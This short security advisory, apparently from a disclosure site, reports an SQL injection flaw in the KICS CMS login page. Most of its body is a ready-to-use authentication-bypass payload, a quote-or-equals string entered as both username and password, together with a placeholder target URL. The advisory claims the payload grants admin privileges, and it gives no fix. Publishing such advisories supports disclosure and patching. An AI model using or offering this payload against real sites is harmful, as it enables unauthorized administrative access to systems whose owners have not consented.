there is an sql injection problem in KICS CMS login page and it can be
exploited to gain admin privileges.
exploit:
user: 'or''='
pass: 'or''='
example:http://www.target.com/kicscms/index.asp
thx
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.